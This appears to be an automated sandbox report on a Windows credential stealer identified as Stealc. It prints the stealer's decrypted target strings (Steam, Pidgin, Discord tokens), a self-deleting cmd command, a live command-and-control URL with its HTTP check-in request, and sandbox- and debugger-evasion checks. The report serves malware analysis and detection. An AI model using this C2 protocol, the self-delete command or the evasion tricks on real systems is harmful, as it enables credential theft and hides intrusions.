                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: Pidgin
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: \.purple\
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: accounts.xml
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: dQw4w9WgXcQ
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: token:
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: Software\Valve\Steam
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: SteamPath
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: \config\
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: ssfn*
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: config.vdf
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: DialogConfig.vdf
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: DialogConfigOverlay*.vdf
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: libraryfolders.vdf
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: loginusers.vdf
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: \Steam\
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: sqlite3.dll
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: browsers
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: done
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: soft
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: \Discord\tokens.txt
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: /c timeout /t 5 & del /f /q "
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: " & del "C:\ProgramData\*.dll"" & exit
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: C:\Windows\system32\cmd.exe
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: https
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: Content-Type: multipart/form-data; boundary=----
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: POST
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: HTTP/1.1
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: Content-Disposition: form-data; name="
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: hwid
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: build
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: token
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: file_name
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: file
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: message
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: screenshot.jpg
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006C9030 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_006C9030
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006BA210 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_006BA210
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006B72A0 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_006B72A0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006BA2B0 CryptUnprotectData,LocalAlloc,LocalFree,0_2_006BA2B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006BC920 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_006BC920
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000003.1722686699.000000000510B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp
                Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000003.1722686699.000000000510B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006C40F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_006C40F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006BE530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_006BE530
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006B1710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_006B1710
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006C47C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_006C47C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006BF7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_006BF7B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006C4B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_006C4B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006C3B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_006C3B00
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006BDB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_006BDB80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006BBE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_006BBE40
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006BEE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_006BEE20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006BDF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_006BDF10

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.206:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.206/6c4adf523b719729.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIEHDBGDHDAECBGDHJKFHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 49 45 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 30 33 36 36 31 33 36 31 41 30 31 32 32 36 33 31 38 30 30 32 35 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 2d 2d 0d 0a Data Ascii: ------FIEHDBGDHDAECBGDHJKFContent-Disposition: form-data; name="hwid"A03661361A012263180025------FIEHDBGDHDAECBGDHJKFContent-Disposition: form-data; name="build"tale------FIEHDBGDHDAECBGDHJKF--
                Source: Joe Sandbox ViewIP Address: 185.215.113.206 185.215.113.206
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006B62D0 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_006B62D0
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIEHDBGDHDAECBGDHJKFHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 49 45 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 30 33 36 36 31 33 36 31 41 30 31 32 32 36 33 31 38 30 30 32 35 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 2d 2d 0d 0a Data Ascii: ------FIEHDBGDHDAECBGDHJKFContent-Disposition: form-data; name="hwid"A03661361A012263180025------FIEHDBGDHDAECBGDHJKFContent-Disposition: form-data; name="build"tale------FIEHDBGDHDAECBGDHJKF--
                Source: file.exe, 00000000.00000002.1763680233.000000000145E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206
                Source: file.exe, 00000000.00000002.1763680233.000000000145E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1763680233.00000000014B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
                Source: file.exe, 00000000.00000002.1763680233.00000000014B7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1763680233.00000000014A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php
                Source: file.exe, 00000000.00000002.1763680233.00000000014B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php/
                Source: file.exe, 00000000.00000002.1763680233.00000000014A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpu
                Source: file.exe, 00000000.00000002.1763680233.00000000014B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/e
                Source: file.exe, 00000000.00000002.1763680233.00000000014B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/ws
                Source: file.exe, 00000000.00000002.1763680233.000000000145E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206X
                Source: file.exe, file.exe, 00000000.00000003.1722686699.000000000510B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB00D40_2_00AB00D4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B9C0790_2_00B9C079
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B010790_2_00B01079
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006F00980_2_006F0098
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E21380_2_006E2138
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0070B1980_2_0070B198
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0071E2580_2_0071E258
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006F42880_2_006F4288
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0073B3080_2_0073B308
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0072D39E0_2_0072D39E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A4B4310_2_00A4B431
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006D45730_2_006D4573
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006DE5440_2_006DE544
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006F45A80_2_006F45A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0071D5A80_2_0071D5A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0072A6480_2_0072A648
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007396FD0_2_007396FD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006F66C80_2_006F66C8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0070D7200_2_0070D720
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007267990_2_00726799
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007048680_2_00704868
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B098D70_2_00B098D7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B0482E0_2_00B0482E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0071F8D60_2_0071F8D6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007098B80_2_007098B8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0070B8A80_2_0070B8A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00724BA80_2_00724BA8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00720B880_2_00720B88
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B83CBF0_2_00B83CBF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B37CA80_2_00B37CA8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0072AC280_2_0072AC28
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B02C4F0_2_00B02C4F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E1D780_2_006E1D78
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0070BD680_2_0070BD68
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B07DF60_2_00B07DF6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0071AD380_2_0071AD38
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00704DC80_2_00704DC8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00705DB90_2_00705DB9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006F8E780_2_006F8E78
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00721EE80_2_00721EE8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B86F980_2_00B86F98
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AA7F990_2_00AA7F99
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B0CF0E0_2_00B0CF0E
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 006B4610 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: aslwbrhj ZLIB complexity 0.9949668784288327
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006C9790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_006C9790
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006C3970 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_006C3970
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\84D32R4X.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 2118656 > 1048576
                Source: file.exeStatic PE information: Raw size of aslwbrhj is bigger than: 0x100000 < 0x19a200
                Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000003.1722686699.000000000510B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp
                Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000003.1722686699.000000000510B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.6b0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;aslwbrhj:EW;bqvglmea:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;aslwbrhj:EW;bqvglmea:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006C9BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_006C9BB0
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x214cb8 should be: 0x20790c
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: aslwbrhj
                Source: file.exeStatic PE information: section name: bqvglmea
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A590BE push 7B2E5044h; mov dword ptr [esp], ebx0_2_00A590E6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B7A090 push edi; mov dword ptr [esp], ecx0_2_00B7A0D8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B7A090 push 4171B3EAh; mov dword ptr [esp], edi0_2_00B7A15B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C030AA push esi; mov dword ptr [esp], 49285AFCh0_2_00C030CF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C030AA push edi; mov dword ptr [esp], eax0_2_00C030E8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB00D4 push eax; mov dword ptr [esp], ebx0_2_00AB0123
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB00D4 push 3D6E3655h; mov dword ptr [esp], esi0_2_00AB01AB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB00D4 push eax; mov dword ptr [esp], ecx0_2_00AB01C1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B01079 push 1DD46DE2h; mov dword ptr [esp], ebp0_2_00B010C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B01079 push edx; mov dword ptr [esp], ebx0_2_00B010C9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B01079 push edi; mov dword ptr [esp], eax0_2_00B011F1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B01079 push edx; mov dword ptr [esp], ebp0_2_00B0129E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B01079 push 69D1DF26h; mov dword ptr [esp], ebx0_2_00B012D5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B01079 push 77F97562h; mov dword ptr [esp], edi0_2_00B012FB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B01079 push 061E190Eh; mov dword ptr [esp], ebp0_2_00B01315
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B01079 push ebx; mov dword ptr [esp], edx0_2_00B013F6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B01079 push eax; mov dword ptr [esp], ebx0_2_00B0147D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B01079 push 5B0ED900h; mov dword ptr [esp], eax0_2_00B014AB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B01079 push 6D736249h; mov dword ptr [esp], edi0_2_00B0151F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B01079 push 49F9E934h; mov dword ptr [esp], eax0_2_00B01542
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B01079 push ecx; mov dword ptr [esp], 2FD38B11h0_2_00B0154C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B01079 push 0508960Bh; mov dword ptr [esp], eax0_2_00B01571
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B01079 push 722C8053h; mov dword ptr [esp], eax0_2_00B0158A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B01079 push eax; mov dword ptr [esp], 6DA13093h0_2_00B0158E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B01079 push 525DC0BAh; mov dword ptr [esp], edi0_2_00B015C4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B01079 push ecx; mov dword ptr [esp], ebx0_2_00B015F4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B01079 push edi; mov dword ptr [esp], esi0_2_00B01617
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B01079 push eax; mov dword ptr [esp], edx0_2_00B016A4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B01079 push eax; mov dword ptr [esp], ebp0_2_00B016CC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B01079 push esi; mov dword ptr [esp], ecx0_2_00B016D5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B01079 push edx; mov dword ptr [esp], esi0_2_00B01703
                Source: file.exeStatic PE information: section name: aslwbrhj entropy: 7.95370802823853

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006C9BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_006C9BB0

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-36334
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99D8E8 second address: 99D8EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99D8EF second address: 99D908 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jno 00007FE784B99A2Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B11FE3 second address: B12029 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FE784D2BEC4h 0x00000008 jmp 00007FE784D2BEBEh 0x0000000d push ecx 0x0000000e jnc 00007FE784D2BEB6h 0x00000014 pop ecx 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push edi 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FE784D2BEBDh 0x0000001f jmp 00007FE784D2BEC6h 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B05D52 second address: B05D58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
